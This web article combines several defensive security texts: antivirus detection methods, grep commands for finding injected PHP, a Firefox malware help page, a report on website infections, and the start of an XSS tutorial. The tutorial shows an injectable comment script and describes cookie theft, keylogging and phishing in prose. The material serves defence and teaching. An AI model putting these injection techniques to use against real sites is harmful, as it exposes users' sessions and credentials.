Malicious web page. What is malicious code? What is malicious JavaScript

Nowadays, most computer attacks occur when visiting malicious web pages. The user may be tricked into providing sensitive data to a phishing site or become the victim of a drive-by download attack that exploits browser vulnerabilities. Thus, a modern antivirus should provide protection not only directly from malware, but also from dangerous web resources.

Antivirus solutions use two main methods to identify sites hosting malware: signature database comparison and heuristic analysis. Signatures are used to pinpoint known threats, while heuristic analysis estimates the likelihood of dangerous behavior. Using a virus database is the more reliable method and keeps the number of false positives to a minimum. However, this method does not detect the latest, still unknown threats.

An emerging threat must first be detected and analyzed by employees of the antivirus vendor's laboratory. Based on the analysis, a corresponding signature is created that can be used to find malware. In contrast, the heuristic method is used to identify unknown threats based on suspicious behavioral factors. This method assesses the likelihood of danger, so false positives are possible.
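The difference between the two approaches can be illustrated with a minimal sketch. The signature set, the marker strings and their weights below are hypothetical values chosen for illustration only; real antivirus engines use far richer signatures and behavioral models.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of known malicious payloads.
KNOWN_BAD_DIGESTS = {hashlib.sha256(b"known malicious payload").hexdigest()}

# Hypothetical heuristic markers with illustrative weights (assumptions).
SUSPICIOUS_MARKERS = {b"eval(": 0.4, b"unescape(": 0.3, b"<iframe": 0.3}


def signature_match(content: bytes) -> bool:
    """Exact match against known threats: reliable, but blind to new ones."""
    return hashlib.sha256(content).hexdigest() in KNOWN_BAD_DIGESTS


def heuristic_score(content: bytes) -> float:
    """Likelihood-style score in [0, 1]; false positives are possible."""
    lowered = content.lower()
    score = sum(w for marker, w in SUSPICIOUS_MARKERS.items() if marker in lowered)
    return min(score, 1.0)
```

A payload that has never been seen before fails the signature check but can still receive a high heuristic score, which is exactly the trade-off described above.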

When detecting malicious links, both methods can be used simultaneously. To add a dangerous resource to the blacklist, its content must first be analyzed by downloading it and scanning it with an antivirus or an intrusion detection system (IDS).

Below is the log of events of the Suricata IDS system when blocking exploits:

Example of an IDS report showing threats identified by signatures:

An example of an Ad-Aware antivirus warning when visiting a malicious site:

Heuristic analysis is performed on the client side to check which sites are being visited. Specially developed algorithms warn the user if the resource being visited shows dangerous or suspicious characteristics. These algorithms can be based on lexical analysis of content or on an assessment of where the resource is hosted. The lexical model is used to alert the user to phishing attacks. For example, URLs such as "http://paaypall.5gbfree.com/index.php" or "http://paypal-intern.de/secure/" are easily identified as phishing copies of the well-known payment system PayPal.
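A lexical check of this kind can be sketched in a few lines. The brand table, the similarity threshold of 0.8 and the function name are assumptions made for this example; they are not taken from any particular antivirus product.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlparse

# Assumed mapping of a brand name to its legitimate domains (illustrative only).
BRANDS = {"paypal": {"paypal.com"}}


def looks_like_phishing(url: str, threshold: float = 0.8) -> bool:
    """Flag hosts that imitate a brand name without belonging to its domain."""
    host = (urlparse(url).hostname or "").lower()
    for brand, legit_domains in BRANDS.items():
        # The genuine domain and its subdomains are never flagged.
        if any(host == d or host.endswith("." + d) for d in legit_domains):
            return False
        # Compare every label fragment of the host name with the brand name.
        for token in re.split(r"[.\-]", host):
            if token and SequenceMatcher(None, token, brand).ratio() >= threshold:
                return True
    return False
```

With these assumptions, both example URLs from the paragraph above are flagged, while the genuine paypal.com domain is not.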

Resource placement analysis collects information about hosting and domain name. Based on the data received, a specialized algorithm determines the degree of danger of the site. This data typically includes geographic data, registrar information, and the person registering the domain.

Below is an example of hosting several phishing sites on one IP address:

Ultimately, despite the many ways to evaluate sites, no method can provide a 100% guarantee of protecting your system. Only the joint use of several computer security technologies can provide certain confidence in the protection of personal data.

Malicious code is code that interferes with the normal operation of a website. It can be embedded in themes, databases, files and plugins.

The result of malicious code may be the deletion of useful content or its publication on a third-party resource. In this way, attackers can organize content theft. This is especially damaging when a young resource with original articles is affected: it may look as if it stole the content from an older resource.

Also, malicious code can place hidden links in a free theme to third-party pages that are accessible to search engines. These links will not always be malicious, but the weight of the main site is guaranteed to suffer.

The general purpose of all malicious code is to disrupt the operation of web pages.

Outwardly, malicious code looks like a chaotic set of characters. In reality, this apparent nonsense hides encoded code containing a sequence of commands.

How malicious code gets onto the site

There are two ways malicious code can get onto a website.

1. Downloading files and plugins from dubious and unreliable resources. Most often, encrypted links penetrate the site using these methods. Explicit code rarely enters a site this way.

2. Hacking the site, followed by penetration. This method is considered more dangerous, because hacking a web page makes it possible to plant not only a "one-time" piece of code, but also entire structures with elements of a malicious program (malware).

Such code is very difficult to eradicate, because it can be restored after removal.

Checking the site for malicious code

It should be remembered that these insidious structures can appear not only in the active theme, but also in any file of the resource. There are several ways to find them:

Manually. To do this, you need to compare the contents of all current files with uninfected versions of the backup. Anything different must be removed.
Using security plugins. In particular, WordPress offers the Wordfence Security plugin. It has the option to scan page files for foreign code content.
With the help of hosting support. The site owner has the right to contact them with a request to scan the resource with their antivirus. As a result, they will provide a report showing the presence of infected files. These files can be cleared of extraneous constructs using a regular text editor.
Via SSH access to the site. The search itself is carried out using the commands:

find /path/to/current/page/directory -type f -iname "*" -exec grep -l "eval" {} \; > ./eval.log

find /path/to/current/page/directory -type f -iname "*" -exec grep -l "base64" {} \; > ./base64.log

find /path/to/current/page/directory -type f -iname "*" -exec grep -l "file_get_contents" {} \; > ./file_get_contents.log

As a result of their execution, information about suspicious files will be obtained. The list of these files will be written to a log stored in the current directory.
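Where shell access is inconvenient, the same search can be approximated with a short script. This is a minimal sketch: the list of function names mirrors the commands above plus str_rot13, and the function name find_suspicious_files is an assumption made for this example. A match only marks a file for manual review, since legitimate code uses these functions too.

```python
import os
import re

# PHP functions commonly abused by injected code (same idea as the commands above).
PATTERN = re.compile(rb"\b(eval|base64_decode|str_rot13|file_get_contents)\s*\(")


def find_suspicious_files(root: str) -> dict:
    """Map each file under root to the suspicious function names it calls."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            found = sorted({m.group(1).decode() for m in PATTERN.finditer(data)})
            if found:
                hits[path] = found
    return hits
```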

Checking a site for malicious code using the eval function. This PHP function executes any code passed to it as a string, even obfuscated code. Its argument is usually wrapped in a decoding function (typically base64_decode or str_rot13). It is because of these popular encodings that malicious code looks like a meaningless string of Latin characters.

Open the page editor.

Copy the contents of the functions.php file to the clipboard.

Paste it into any text editor (notepad).

Find the eval command.

Before removing malicious code, analyze what parameters the function expects as input. Because the parameters arrive in encoded form, they need to be decoded with a suitable decoder. Once you understand the input parameter, you can determine where it belongs in the text of the functions.php file.
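The decoding step can be done offline, without ever executing the suspicious code. The sketch below tries the two encodings named above on a string copied out of an eval call; the function name decode_layers is hypothetical.

```python
import base64
import codecs


def decode_layers(payload: str) -> dict:
    """Return the payload as decoded by ROT13 and, if valid, by Base64."""
    results = {"rot13": codecs.decode(payload, "rot13")}
    try:
        raw = base64.b64decode(payload, validate=True)
        results["base64"] = raw.decode("utf-8", errors="replace")
    except ValueError:
        # Not valid Base64 (binascii.Error is a subclass of ValueError).
        results["base64"] = None
    return results
```

Only the decoding that yields readable PHP or HTML is meaningful; obfuscated code is often encoded several times, in which case the function can be applied again to the decoded output.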

Removing malicious code

Once malicious code is detected, it simply needs to be deleted as a regular line in a text file.

Protection against malicious code

In order to prevent the appearance of malicious code on the site, it is necessary to follow a number of preventive measures.

Use only proven software:

Download distributions only from trusted sources.
Update your server software in a timely manner.
Perform regular audits of your server's security system.
Remove outdated debugging scripts.

Set strong passwords on your server software:

Come up with a combination of 12 characters, including numbers and letters of different cases.
For each service, create your own unique password.
Change your passwords every 3 months.
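A password that meets the rules above can be generated rather than invented. This is a minimal sketch using the standard secrets module; the function name and the retry loop are choices made for this example.

```python
import secrets
import string


def generate_password(length: int = 12) -> str:
    """Random password containing lowercase letters, uppercase letters and digits."""
    if length < 3:
        raise ValueError("length must allow one character of each class")
    alphabet = string.ascii_letters + string.digits
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        # Retry until every required character class is present.
        if (any(c.islower() for c in candidate)
                and any(c.isupper() for c in candidate)
                and any(c.isdigit() for c in candidate)):
            return candidate
```

Calling generate_password() once per service gives each of them its own unique password.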

Control data entered by users:

Set up HTML markup filters in input fields, the contents of which will be included in the page code.
Set up a server-side check that input data falls within the acceptable range.
Use WAF. Web Application Firewall is a powerful tool for protecting your website from hacker attacks.

Limit access rights to your resource.

Block or limit access to the administration tools of your website engine and its databases. Also, block access to configuration files and backup copies of production code.

Sites that allow users to upload files are the most susceptible to this kind of penetration by malicious code.

1. Organize protection against bots. For these purposes, many CMS are equipped with special plugins;

2. Set up validation of user input:

Prevent JavaScript code from being inserted inside <script> constructs.
Maintain a list of safe HTML tags and filter out constructs that are not included in this list.
Analyze the links that users send.
There are special services for this, for example Safe Browsing API. It allows you to check the security of a document by URL.
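The allowlist approach from the list above can be sketched with the standard html.parser module. The set of permitted tags is an assumption made for this example, and all attributes are dropped for simplicity; a production site would normally rely on a maintained sanitizing library instead.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p"}  # assumed allowlist
DROP_CONTENT = {"script", "style"}              # tags whose content is discarded


class AllowlistFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._skip_depth += 1
        elif tag in ALLOWED_TAGS and not self._skip_depth:
            self.out.append(f"<{tag}>")  # attributes are dropped on purpose

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag in ALLOWED_TAGS and not self._skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data))  # text is re-escaped before output


def sanitize(fragment: str) -> str:
    """Keep allowlisted tags, drop everything else, escape all text."""
    parser = AllowlistFilter()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Anything not on the list, including script elements and event-handler attributes such as onclick, never reaches the page.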

How to prevent accidental placement of malicious code

Carefully monitor the software you use:

Download libraries and CMS extensions only from trusted sources, and preferably from official websites.

Study the code of non-standard extensions that you are going to install on your website engine.

Place your advertisements very carefully:

Publish ads on your site that are offered only by reliable advertisers.

Try to post static content on your page.

Beware of affiliate programs with hidden blocks.

Malware is short for "Malicious Software". It is a term generally used for software installed on your computer that is designed to infiltrate or damage a computer system without the owner's informed consent. Sometimes a problem with Firefox may be the result of malware installed on your computer that you may not be aware of. This article describes the common symptoms and explains how to prevent malware from being installed and how to get rid of it.

How do I know that my Firefox problem is a result of malware?

Symptoms are various and depend on the malware but if you have one or several of these behaviors, you may have malware installed on your computer.

Some ad popups display all the time, although you've blocked popups. For more information on blocking popups, see Pop-up blocker settings, exceptions and troubleshooting.
Your searches are redirected to another site in order to feed you content from that website, and you are prevented from blocking them. For more information, see What to do when searches take you to the wrong search website.
Your home page has been hijacked. For more information on setting your home page, see How to set the home page.
Firefox never finishes loading or can't load certain websites. For more information, see Websites show a spinning wheel and never finish loading and Firefox cannot load certain websites.
Firefox crashes or hangs a lot. For more information, see Firefox crashes - Troubleshoot, prevent and get help fixing crashes and Firefox hangs or is not responding - How to fix.
Firefox does not start. For more information, see Firefox won't start - find solutions.
Problems with connecting to Facebook. For more information on problems with Facebook, see Fix problems with Facebook games, chat and more.
Firefox keeps opening many tabs or windows. For more information, see Firefox repeatedly opens empty tabs or windows after you click on a link.

Unwanted toolbars have been installed. For more information on customizing Firefox, see Remove a toolbar that has taken over your Firefox search or home page and How to remove the Babylon toolbar, home page and search engine.

How do I prevent malware from being installed?

Keep your operating system and other software updated: Installation of malicious software usually takes advantage of known security vulnerabilities in other programs, which may have been patched in later versions. Make sure you are using the latest version of all software you use, either by enabling the software's automatic update feature, if available, or by checking for updates from the software provider and by using the Windows Update feature.
Don't install untrusted software: Some websites offer you software to accelerate your browser, to help you search the Web, or to add toolbars that do things Firefox already does. Some unwanted programs also come bundled in software packages. Usually, these programs gather information on your browsing behavior that serves only the people who designed them, and they interfere with Firefox. Make sure you install add-ons from Mozilla's add-on website and uncheck unwanted programs in software wizards. Check to see if you have unwanted add-ons and disable or remove them.
Don't click inside misleading pop-up windows: Many malicious websites try to install malware on your system by making images look like pop-up windows, or by displaying an animation of the website scanning your computer. For more information on detecting a misleading pop-up, see Pop-up blocker settings, exceptions and troubleshooting.
Don't run a fake Firefox: Download Firefox from mozilla.org/firefox.

Run anti-virus and anti-spyware real-time protection and scan your system periodically.

Make sure your anti-virus and anti-spyware real-time protection is enabled. Scan your computer at least every month.

How do I get rid of malware?

The Wikipedia article Linux malware has information and recommendations for Linux users.

Microsoft has basic free anti-virus and anti-spyware security software built in on Windows 8 and Windows 10, and available for Windows 7 (see What is Microsoft Security Essentials?). If your security software hasn't detected malware, scan your system with the free malware scanning programs listed below. You should scan with all of the programs, because each one detects different malware, and make sure that you update each program to get the latest version of its database before doing a scan.

Warning: Anti-virus and anti-spyware software may sometimes generate false positives. Consider quarantining suspicious files rather than deleting them.

Distribution of malware through websites

Introduction. Cybercrime: trends and developments

Over the past few years, the Internet has become a dangerous place. Originally created for a relatively small number of users, it has significantly exceeded the expectations of its creators. There are more than 1.5 billion Internet users in the world today, and the number is constantly growing as technology becomes more accessible.

Criminals also noticed this trend and very quickly realized that committing crimes using the Internet (now called cybercrime) has a number of significant advantages.

First, cybercrime does not involve much risk: since it has no geopolitical barriers, it is difficult for law enforcement agencies to catch criminals. Moreover, international investigations and prosecutions cost a lot of money, so such actions are usually taken only in special cases. Secondly, cybercrime is simple: the Internet offers a huge number of “instructions” for hacking computers and writing viruses, without any special knowledge or experience required. These are the two main factors that have turned cybercrime into a multi-billion dollar industry that is truly a closed ecosystem.

Both information security companies and software manufacturers are constantly fighting cybercrime. Their goal is to provide Internet users with reliable protection and create secure software. Attackers, in turn, constantly change tactics in order to counteract the countermeasures taken, which has resulted in two distinct trends.

Firstly, malware is deployed using zero-day vulnerabilities, i.e. vulnerabilities for which patches have not yet been created. With the help of such vulnerabilities, even computer systems that have all the latest updates installed, but do not have special security solutions, can be infected. Zero-day vulnerabilities are a valuable commodity (their exploitation can potentially lead to serious consequences) and are sold on the black market for tens of thousands of dollars.

Secondly, we are seeing a sharp increase in the amount of malware designed specifically to steal sensitive information for sale on the black market: credit card numbers, bank details, passwords for sites like eBay or PayPal, and even passwords for online games such as World of Warcraft.

One of the obvious reasons for the scale of cybercrime is its profitability, which will always be a driver in the creation of new cybercrime technologies.

In addition to the developments that are being carried out for the needs of cybercriminals, we note another trend: the spread of malware through the World Wide Web. Following the outbreaks earlier this decade caused by email worms such as Melissa, many security companies focused their efforts on developing solutions that could neutralize malicious attachments. In some cases this meant stripping all executable attachments from messages.

However, the Web has recently become the main source of malware distribution. Malicious programs are placed on websites, and then either users are tricked into running them manually, or the programs are executed automatically by exploits on the computers being infected.

We at Kaspersky Lab are watching what is happening with growing concern.

Statistics

For the past three years, we have been monitoring so-called clean websites (between 100,000 and 300,000) to determine at what point they became hotspots for malware. The number of monitored sites was constantly growing as new domains were registered.

The table shows the maximum recorded infection rate of the web pages monitored throughout each year. The sharp increase in the proportion of infected sites is obvious: while in 2006 approximately one site in twenty thousand was infected, by 2009 one site in one hundred and fifty was infected. The percentage of infected sites fluctuates around this last figure, which may indicate that a saturation point has been reached: all websites that could be infected have been infected. However, their number rises or falls as new vulnerabilities are discovered or as new tools appear that allow attackers to infect new websites.

The following two tables provide data on the malware that was most frequently found on websites in 2008 and 2009.

Top 10 Malware – 2008

Top 10 Malware – 2009

In 2008, Trojan-Clicker.JS.Agent.h was discovered in a large number of cases. It is followed by Trojan-Downloader.JS.Iframe.oj with a margin of less than 1%.

Page infected with Trojan-Clicker.JS.Agent.h

Decoded Trojan-Clicker.JS.Agent.h

Trojan-Clicker.JS.Agent.h is a typical example of a mechanism that was used in 2008 and is still used (in 2009) to inject malicious code. A small piece of JavaScript code is added to the page, usually obfuscated to make analysis difficult. In the code shown in the figure above, the obfuscation simply consists of replacing the ASCII characters that make up the malicious code with their hex codes. Once decoded, the code usually turns out to be an inline frame (iframe) leading to the site where the exploits are located. The IP address the link points to may change, as the exploits are hosted on many different sites. The main page of a malicious site usually contains exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, the second most frequently encountered malware, operates in a similar way.
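Hex obfuscation of this kind is easy to reverse without running the script. The sketch below assumes the percent-encoded form (%3C for "<" and so on) typically passed to JavaScript's unescape; the sample is a harmless placeholder built for this example, not the actual Trojan-Clicker.JS.Agent.h code, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Runs of at least four %XX escapes are treated as encoded payloads (assumption).
HEX_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){4,}")


def to_percent_hex(text: str) -> str:
    """Encode ASCII text the way the obfuscator does (used to build a sample)."""
    return "".join(f"%{ord(ch):02X}" for ch in text)


def decode_hex_runs(script: str) -> list:
    """Return the decoded form of every hex-encoded run found in the script."""
    return [unquote(m.group(0)) for m in HEX_RUN.finditer(script)]


harmless = '<iframe src="http://example.invalid/"></iframe>'
obfuscated = 'document.write(unescape("' + to_percent_hex(harmless) + '"))'
print(decode_hex_runs(obfuscated))
```

The decoded output reveals the hidden iframe and the address it points to, which is the information an analyst needs.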

There were two interesting cases in 2009 where malware was distributed through web pages. In the first case, we are talking about the Net-Worm.JS.Aspxor.a malware, which was first discovered in July 2008 and widely spread in 2009. This malware uses a special utility to find SQL vulnerabilities in websites through which it injects malicious iframes.

Another interesting case is the Gumblar malware. It was named after the Chinese domain it used to distribute exploits. The string “gumblar” in obfuscated JavaScript code planted on a website is a sure sign that the site is infected.

Example of embedding Gumblar code into a website page

After deobfuscation, Gumblar's malicious code looks like this:

Decoded Gumblar Code

The “gumblar.cn” domain was closed, which, however, did not stop cybercriminals from continuing malicious attacks from new domains.

Methods of infection and methods of distribution

Currently, there are three main ways to infect websites with malware.

The first popular method is to exploit vulnerabilities in the website itself, for example SQL injection, which allows an attacker to add malicious code to website pages. Attack tools such as the ASPXor Trojan clearly demonstrate how this method works: they can be used to scan thousands of IP addresses at once and inject malicious code into them. Traces of such attacks can often be seen in web server access logs.
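Looking for such traces can be partly automated. The sketch below URL-decodes each access log line and searches it for a few SQL fragments that commonly appear in injection attempts; the pattern list and the function name are assumptions made for this example, not a complete detection rule set.

```python
import re
from urllib.parse import unquote_plus

# Illustrative SQL injection hints (assumed patterns, far from exhaustive).
SQLI_HINTS = re.compile(
    r"(declare\s+@\w+|cast\s*\(\s*0x[0-9a-f]+|exec\s*\(\s*@\w+|union\s+select)",
    re.IGNORECASE,
)


def suspicious_requests(log_lines):
    """Return the log lines whose decoded request contains an injection hint."""
    hits = []
    for line in log_lines:
        decoded = unquote_plus(line)  # attackers usually URL-encode the payload
        if SQLI_HINTS.search(decoded):
            hits.append(line)
    return hits
```

Any line reported this way should be checked by hand, since ordinary search queries can occasionally contain the same words.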

The second method involves infecting a website developer's computer with malware that monitors the creation and download of HTML files and then injects malicious code into those files.

Finally, another method is to infect the computer of a website developer, or of another person with access to the hosting account, with a password-stealing Trojan (such as Ransom.Win32.Agent.ey). This Trojan typically contacts a server over HTTP to transmit FTP account passwords, which it collects from popular FTP clients such as FileZilla and CuteFtp. The malware component located on the server writes the received information to a SQL database. Then a special program, also located on the server, logs in to each FTP account, retrieves the index page, adds the malicious code to it, and uploads the page back.

Since in the latter case the hosting account credentials become known to the attackers, sites are often re-infected: web page developers notice the infection themselves or learn about it from site visitors, clean the page of malicious code, and the next day the page is infected again.

Example of re-infection of a web page (*.*.148.240)

Another common situation is when information about the same vulnerability or hosting account data simultaneously falls into the hands of different cyber groups, between which a fight begins: each group tries to infect a website with its own malware. Here is an example of such a situation:

An example of multiple infections of a website (*.*.176.6) with different malware

On June 11, 2009, the website we were monitoring was clean. On July 5, 2009, it was infected with the Trojan-Clicker.JS.Agent.gk malware. On July 15, 2009, the website turned out to be infected with another piece of malware, Trojan-Downloader.JS.Iframe.bin. Ten days later, the site was infected with yet another program.

This situation occurs quite often: websites can be infected simultaneously with different malware, the code of which is placed one after the other. This happens when access data falls into the hands of different cyber groups.

Below is the sequence of actions that must be taken if a website is infected with malicious code:

Determine who has access to the hosting server. Run an Internet security program scanning their computers with an up-to-date database. Remove all detected malware
Set a new strong hosting password. A strong password should combine letters, numbers and special characters to make it difficult to guess
Replace all infected files with clean copies
Find all backups that may contain infected files and disinfect them
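Working out which files need replacing is easier when the live site is compared with a known clean backup. The following sketch compares SHA-256 digests of the two directory trees; the function names are hypothetical, and it assumes a backup that is itself free of infection.

```python
import hashlib
import os


def file_digests(root: str) -> dict:
    """Map each file path (relative to root) to the SHA-256 digest of its content."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_against_backup(live_root: str, backup_root: str) -> dict:
    """List files that were modified, added or removed relative to the backup."""
    live, clean = file_digests(live_root), file_digests(backup_root)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }
```

Files reported as modified or added are the first candidates for inspection and replacement.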

Our experience shows that infected websites are often re-infected after treatment. On the other hand, this usually happens only once: if after the first infection the webmaster can limit himself to relatively superficial actions, in the event of a second infection he usually takes more serious measures to ensure the security of the site.

Evolution: Placing malware on “clean” websites

A couple of years ago, when cybercriminals began actively using the web to host malware, they usually operated through so-called bulletproof hosting or through hosting paid for with stolen credit cards. Noticing this trend, companies working in the field of Internet security joined forces in the fight against unscrupulous hosting providers that allow malicious resources to be hosted (such as the American hosting provider McColo and the Estonian provider EstDomains). And although there are still cases today where malware is hosted on dedicated malicious sites, located, for example, in China, where it is still difficult to shut a site down, there has been an important shift towards hosting malware on "clean" and completely trustworthy domains.

Action and reaction

As we've already said, one of the most important aspects of the ongoing battle between cybercriminals and antivirus vendors is the ability to quickly respond to what the enemy is doing. Both sides are constantly changing their tactics and introducing new technologies, trying to counteract the enemy.

Most web browsers (Firefox 3.5, Chrome 2.0 and Internet Explorer 8.0) now have built-in protection in the form of a URL filter. This filter prevents the user from accessing malicious sites that contain exploits for known or unknown vulnerabilities, or that use social engineering techniques to steal personal data.

For example, Firefox and Chrome use the Google Safe Browsing API, a free service from Google for filtering URLs. At the time of writing, the Google Safe Browsing API list contained approximately 300,000 known malicious website addresses and over 20,000 phishing website addresses.

The Google Safe Browsing API takes a smart approach to URL filtering: instead of sending each URL to an external resource for verification, as Internet Explorer 8's phishing filter does, Google Safe Browsing checks URLs using their checksums, calculated with the MD5 algorithm. For this filtering method to be effective, the checksum list of malicious addresses must be updated regularly; updates are recommended every 30 minutes. The disadvantage of this method is that the number of malicious websites is greater than the number of entries in the list. To keep the size of the list manageable (currently it is about 12 MB), only the most frequently encountered malicious sites are included. This means that even if you use applications that support these technologies, your computer is still at risk of infection if you visit malicious sites that are not on the list. Overall, the widespread adoption of secure browsing technologies shows that web browser developers have taken notice of the new trend of malware spreading through websites and are taking action in response. In fact, web browsers with built-in security are already becoming the norm.
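The idea of checking a URL against a locally stored checksum list can be sketched as follows. This is a simplified illustration of the approach as described above, not the actual Safe Browsing protocol: the class and function names are hypothetical, and a real client would also canonicalize URLs and download list updates from the service.

```python
import hashlib


def url_checksum(url: str) -> str:
    """MD5 checksum of a URL (simplified: whitespace is trimmed, nothing else)."""
    return hashlib.md5(url.strip().encode("utf-8")).hexdigest()


class LocalBlocklist:
    """Locally stored set of checksums of known malicious URLs."""

    def __init__(self, checksums=()):
        self._checksums = set(checksums)

    def update(self, added=(), removed=()):
        """Apply a periodic list update (for example, every 30 minutes)."""
        self._checksums.update(added)
        self._checksums.difference_update(removed)

    def is_listed(self, url: str) -> bool:
        # The URL itself never leaves the machine; only its checksum is compared.
        return url_checksum(url) in self._checksums
```

The sketch also makes the limitation visible: a malicious URL whose checksum has not yet been added to the list is reported as unlisted.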

Conclusion

Over the past three years, there has been a sharp increase in the number of legitimate websites infected with malware. Today, the number of infected sites on the Internet is one hundred times greater than three years ago. Frequently visited sites are attractive to cybercriminals because they can be used to infect a large number of computers in a short time.

Here are some simple tips for webmasters on how to secure websites:

Protect your hosting accounts with strong passwords
To upload files to servers, use the SCP/SSH/SFTP protocols instead of FTP - this way you will be protected from sending passwords over the Internet in clear text
Install an antivirus product and run a computer scan
Keep several backup copies of your site so you can restore it in case of infection.

When navigating the Internet, there are several factors that increase the risk of contracting malicious code from a website: using pirated software, ignoring updates that address vulnerabilities in the software you are using, not having an antivirus solution on your computer, and a general lack of knowledge or understanding of threats on the Internet.

Pirated software plays a significant role in the spread of malware. Pirated copies of Microsoft Windows typically do not support automatic updates released by Microsoft, which gives cybercriminals the opportunity to exploit unpatched vulnerabilities in these products.

In addition, older versions of Internet Explorer, still the most popular browser, have a large number of vulnerabilities. In most cases, Internet Explorer 6.0 without installed updates is not protected from the harmful effects of any malicious website. Because of this, it is extremely important to avoid using pirated software, especially pirated copies of Windows.

Another risk factor is working on a computer without an antivirus program installed. Even if the system itself has the latest updates, malicious code can penetrate it through zero-day vulnerabilities in third-party software. Antivirus software updates are typically released much more frequently than software patches, and provide system security at a time when third-party software vulnerabilities have not yet been patched.

And although installing updates for programs is important to maintain the required level of security, the human factor also plays an important role. For example, a user may want to watch an “interesting video” downloaded from the Internet, not suspecting that instead of the video he was given a malicious program. This trick is often used on malicious sites when exploits fail to penetrate the operating system. This example shows why users should be aware of the dangers posed by Internet threats, especially those associated with social networks (Web 2.0), which have recently been actively targeted by cybercriminals.

Don't download pirated software
Keep all software up to date: operating system, web browsers, PDF viewers, players, etc.
Install and always use an antivirus product such as Kaspersky Internet Security 2010
Make it a point to have your employees spend a few hours each month reviewing security websites, such as www.viruslist.com, where they can learn about Internet threats and protection techniques.

Finally, remember: preventing an infection is easier than curing it. Take safety measures!

The following is a comprehensive tutorial on cross-site scripting.

Part One: Overview

What is XSS?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.

The attacker does not attack his victim directly. Instead, it exploits a vulnerability in the website the victim is visiting and injects malicious JavaScript code. In the victim's browser, the malicious JavaScript appears as a legitimate part of the website, and the website itself acts as a direct accomplice to the attacker.

Injection of malicious JavaScript code

The only way for an attacker to run malicious JavaScript in a victim's browser is to inject it into one of the pages that the victim loads from the website. This is possible if a website allows users to enter data on its pages, and the attacker can insert a string that will be detected as part of the code in the victim's browser.

The example below shows a simple server-side script that is used to display the latest comment on a site:

print "<html>"
print "Last comment:"
print database.latestComment
print "</html>"

The script assumes that the comment consists of text only. However, since user input is included directly, an attacker could submit this comment: "<script>...</script>". Any user visiting the page will now receive the following response:

<html>
Last comment:
<script>...</script>
</html>

When the user's browser loads the page, it will execute whatever JavaScript code is contained inside the <script> tags. The attacker has successfully carried out the attack.
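The vulnerable script above, and one common way to neutralize the injected comment, can be sketched as follows. The function names are hypothetical, and escaping on output is only one of several possible defenses; it is shown here because it makes the mechanics of the attack easy to see.

```python
from html import escape


def render_unsafe(latest_comment: str) -> str:
    """Mirror of the vulnerable script: the comment is inserted verbatim."""
    return "<html>\nLast comment:\n" + latest_comment + "\n</html>"


def render_escaped(latest_comment: str) -> str:
    """Same page, but HTML special characters in the comment are escaped."""
    return "<html>\nLast comment:\n" + escape(latest_comment) + "\n</html>"


comment = "<script>...</script>"
print(render_unsafe(comment))   # the browser would execute the script
print(render_escaped(comment))  # the browser would display it as plain text
```

In the escaped version the angle brackets reach the browser as &lt; and &gt;, so the comment is shown as text instead of being interpreted as code.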

What is malicious JavaScript?

The ability to execute JavaScript in the victim's browser may not seem particularly malicious. JavaScript runs in a very restricted environment that has extremely limited access to user and operating system files. In fact, you can open the JavaScript console in your browser right now and execute any JavaScript you want, and it is very unlikely that you will be able to cause any harm to your computer.

However, the potential for JavaScript code to act as malicious code becomes clearer when you consider the following facts:

JavaScript has access to some sensitive user information, such as cookies.
JavaScript can send HTTP requests with arbitrary content in any direction using XMLHttpRequest and other mechanisms.
JavaScript can make arbitrary changes to the HTML code of the current page using DOM manipulation techniques.

Taken together, these facts can lead to very serious security breaches, as explained next.

Consequences of malicious JavaScript code

Among other things, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to carry out the following types of attacks:

Cookie theft

An attacker can access the victim's cookies associated with the website using document.cookie, send them to their own server, and use them to extract sensitive information such as session IDs.

Keylogger

An attacker could register a keyboard event listener using addEventListener and then send all of the user's keystrokes to their server, potentially recording sensitive information such as passwords and credit card numbers.

Phishing

An attacker could insert a fake login form into the page using DOM manipulation, set the form's action attribute to point to their own server, and then trick the user into submitting sensitive information.

Although these attacks differ significantly, they all have one crucial similarity: because the attacker injects code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that site: it has access to the victim's data for that website (such as cookies), and the hostname displayed in the URL bar is that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything that the website itself can do.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript code in other users' browsers, the security of your website and its users is compromised.

To emphasize this point, some malicious script examples in this tutorial are left without detail, using <script>...</script>. This indicates that the mere presence of a script injected by an attacker is a problem, regardless of what specific code the script actually executes.

Part two: XSS attack

Participants in the XSS attack

Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, there are three parties to an XSS attack: the website, the victim, and the attacker.

The website provides HTML pages to users who request them. In our examples it is located at http://website/.
- A website database is a database that stores some of the data entered by users on the pages of a website.
The victim is an ordinary user of a website who requests pages from it using their browser.
The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.
